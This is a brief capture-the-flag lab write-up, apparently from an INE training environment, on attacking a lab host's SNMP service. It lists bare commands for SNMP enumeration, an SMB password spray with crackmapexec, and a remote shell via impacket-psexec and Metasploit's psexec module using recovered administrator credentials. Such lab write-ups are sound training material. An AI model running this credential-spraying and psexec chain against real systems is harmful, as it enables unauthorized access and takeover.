SNMP Analysis

Lab Environment

In this lab environment, the user will get access to a Kali GUI instance. An instance of the vulnerable service can be accessed using the tools installed on Kali at [http://demo.ine.local]

Objective: Exploit the target to gain the shell and find the flag!

Tools

The best tools for this lab are:

  • Nmap

  • Metasploit Framework

  • snmpwalk

  • Hydra

Writeup

nmap -sU -p 161 -sSVC  demo.ine.local
snmpwalk -v2c -c public demo.ine.local
crackmapexec smb demo.ine.local -u users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt --continue-on-success | grep "+"
impacket-psexec AttackDefense/administrator:elizabeth@demo.ine.local

msfconsole
use exploit/windows/smb/psexec
set rhosts demo.ine.local
set smbuser administrator
set smbpass elizabeth
run

Last updated